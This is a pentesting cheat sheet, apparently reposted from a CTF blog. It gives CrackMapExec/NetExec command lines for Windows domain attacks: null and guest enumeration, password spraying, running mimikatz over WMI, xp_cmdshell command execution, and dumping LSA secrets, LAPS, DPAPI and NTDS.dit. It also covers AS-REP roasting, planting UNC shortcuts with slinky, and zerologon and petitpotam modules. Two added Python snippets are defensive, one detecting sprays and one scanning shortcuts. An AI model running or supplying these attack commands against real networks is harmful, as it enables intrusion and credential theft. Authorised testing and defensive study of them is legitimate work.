CrackMapExec and NetExec Cheat Sheet

The document provides a cheat sheet of useful commands for CrackMapExec and NetExec for pentesting, including commands for enumeration, password spraying, dumping secrets, and useful modules.

Uploaded by

setyahangga3

seriotonctf.github.io/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/

A cheat sheet for CrackMapExec and NetExec, featuring useful commands and modules for different services to use during pentesting.

CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)

NetExec: https://github.com/Pennyw0rth/NetExec

Installation: https://www.netexec.wiki/getting-started/installation

The crackmapexec commands below also work with NetExec.

Other names: cme, nxc

Enumeration

Initial Enumeration
bash

crackmapexec smb target

Null Authentication
bash

crackmapexec smb target -u '' -p ''

Guest Authentication
bash

crackmapexec smb target -u 'guest' -p ''

List Shares
bash

crackmapexec smb target -u '' -p '' --shares

bash

crackmapexec smb target -u username -p password --shares

List Usernames
bash

crackmapexec smb target -u '' -p '' --users

bash

crackmapexec smb target -u '' -p '' --rid-brute

bash

crackmapexec smb target -u username -p password --users

Local Authentication
bash

crackmapexec smb target -u username -p password --local-auth

Using Kerberos
bash

crackmapexec smb target -u username -p password -k

Check for hosts that have SMB signing disabled

bash

crackmapexec smb target(s) --gen-relay-list relay.txt

Spraying

Password Spray
bash

crackmapexec smb target -u users.txt -p password --continue-on-success

bash

crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success

bash

crackmapexec ssh target(s) -u username -p password --continue-on-success
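
Seen from the defending side, the spray commands above show up as one source failing against many accounts with only an attempt or two each (with --no-bruteforce each username is paired with a single password), so per-account lockout counters stay quiet. The following is an added example, not part of the original cheat sheet, that flags that pattern by counting distinct accounts per source in a sliding window; the log format, addresses and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in a simplified format: time, event ID, source, account.
# 4625 = failed logon, 4624 = successful logon.
SAMPLE = """\
2024-03-07T10:00:01 4625 src=10.0.0.5 user=alice
2024-03-07T10:00:02 4625 src=10.0.0.5 user=bob
2024-03-07T10:00:02 4625 src=10.0.0.9 user=carol
2024-03-07T10:00:03 4625 src=10.0.0.5 user=carol
2024-03-07T10:00:04 4625 src=10.0.0.5 user=dave
2024-03-07T10:00:05 4624 src=10.0.0.5 user=erin
2024-03-07T10:00:06 4625 src=10.0.0.5 user=frank
2024-03-07T10:00:07 4625 src=10.0.0.9 user=carol
2024-03-07T10:00:09 4625 src=10.0.0.9 user=carol
2024-03-07T10:20:00 4625 src=10.0.0.5 user=grace
"""

LINE = re.compile(r"(\S+) 4625 src=(\S+) user=(\S+)")

def find_sprays(text, window=timedelta(minutes=5), min_users=5):
    """Map each source to the most distinct accounts it failed against in one window."""
    recent = defaultdict(deque)  # source -> (time, account) pairs inside the window
    hits = {}
    for line in text.splitlines():  # assumes records are in time order
        m = LINE.match(line)
        if not m:
            continue  # not a failed logon in the expected format
        ts, src, user = datetime.fromisoformat(m[1]), m[2], m[3].lower()
        q = recent[src]
        q.append((ts, user))
        while ts - q[0][0] > window:  # drop attempts older than the window
            q.popleft()
        distinct = len({u for _, u in q})
        if distinct >= min_users:
            hits[src] = max(hits.get(src, 0), distinct)
    return hits

if __name__ == "__main__":
    print(find_sprays(SAMPLE))
```

Repeated failures against a single account (10.0.0.9 in the sample) are deliberately not reported here; that pattern is what lockout policy already covers.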

SMB

All In One
bash

crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

Spider_plus Module

bash

crackmapexec smb target -u username -p password -M spider_plus

bash

crackmapexec smb target -u username -p password -M spider_plus -o READ_ONLY=false

Dump a specific file


bash

crackmapexec smb target -u username -p password -k --get-file target_file output_file --share sharename

LDAP

Enumerate users using LDAP


bash

crackmapexec ldap target -u '' -p '' --users

All In One
bash

crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups

WMI

bash

cme wmi target(s) -d domain -u username -p password [-H hash] -M mimikatz

MSSQL

Authentication
bash

crackmapexec mssql target -u username -p password

Execute commands using xp_cmdshell

Use -X for PowerShell and -x for cmd.

bash

crackmapexec mssql target -u username -p password -x command_to_execute

Get a file
bash

crackmapexec mssql target -u username -p password --get-file output_file target_file

Secrets Dump

Dump LSA secrets


bash

crackmapexec smb target -u username -p password --local-auth --lsa

gMSA
bash

crackmapexec ldap target -u username -p password --gmsa-convert-id id

bash

crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account

Group Policy Preferences


bash

crackmapexec smb target -u username -p password -M gpp_password

Dump LAPS password


bash

crackmapexec smb target -u username -p password --laps

Dump DPAPI credentials


bash

crackmapexec smb target -u username -p password --laps --dpapi

Dump NTDS.dit

bash

crackmapexec smb target -u username -p password --ntds

Asreproast
bash

crackmapexec ldap target -u username -p password --asreproast asrep.txt

Bloodhound
bash

crackmapexec ldap target -u username -p password --bloodhound -ns ip --collection All

Useful Modules

Webdav
Checks whether the WebClient service is running on the target

bash

crackmapexec smb ip -u username -p password -M webdav

Veeam
Extracts credentials from local Veeam SQL Database

bash

crackmapexec smb target -u username -p password -M veeam

slinky
Creates Windows shortcuts whose icon attribute contains a UNC path to the specified SMB server, in all shares with write permissions

bash

crackmapexec smb ip -u username -p password -M slinky
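
For auditing shares for the shortcuts described above, the following added example (not part of the original cheat sheet or of either tool) reads the ICON_LOCATION string out of each .lnk file, following the Shell Link binary layout, and reports those whose icon is loaded from a UNC path. The function names are hypothetical, and decoding non-Unicode strings as cp1252 is an assumption.

```python
import os
import struct

# Shell Link header magic: HeaderSize 0x4C followed by the LNK class ID.
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_ICON, IS_UNICODE = 0x01, 0x02, 0x40, 0x80

def lnk_icon_location(data):
    """Return the ICON_LOCATION string of a .lnk blob, or None if absent or malformed."""
    if len(data) < 76 or data[:20] != LNK_MAGIC:
        return None
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # the fixed-size header ends here
    # Assumption: non-Unicode strings are decoded as cp1252.
    width, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    try:
        if flags & HAS_IDLIST:    # 2-byte size, then the ID list
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & HAS_LINKINFO:  # 4-byte size that includes itself
            pos += struct.unpack_from("<I", data, pos)[0]
        # StringData order: NAME, RELATIVE_PATH, WORKING_DIR, ARGUMENTS, ICON_LOCATION
        for bit in (0x04, 0x08, 0x10, 0x20, HAS_ICON):
            if flags & bit:
                count = struct.unpack_from("<H", data, pos)[0]
                raw = data[pos + 2:pos + 2 + count * width]
                pos += 2 + count * width
                if bit == HAS_ICON:
                    return raw.decode(enc, errors="replace")
    except struct.error:  # truncated file
        return None
    return None

def is_remote_icon(data):
    """True when the shortcut's icon is loaded from a UNC path."""
    icon = lnk_icon_location(data)
    return bool(icon) and icon.startswith(("\\\\", "//"))

def scan(root):
    """Yield (path, icon) for each .lnk under root whose icon is a UNC path."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".lnk"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)
                if is_remote_icon(data):
                    yield path, lnk_icon_location(data)
```

Call scan() with the path of a mounted share or a local copy of it; each result is a shortcut to review and remove.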

ntdsutil
Dump NTDS with ntdsutil

bash

crackmapexec smb ip -u username -p password -M ntdsutil

ldap-checker
Checks whether LDAP signing and binding are required and/or enforced

bash

cme ldap target -u username -p password -M ldap-checker

bash

crackmapexec smb target -u username -p password -M zerologon

bash

crackmapexec smb target -u username -p password -M petitpotam

bash

crackmapexec smb target -u username -p password -M nopac

Check the MachineAccountQuota


bash

crackmapexec ldap target -u username -p password -M maq

ADCS Enumeration
bash

crackmapexec ldap target -u username -p password -M adcs

Author: serioton
Link: https://seriotonctf.github.io/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.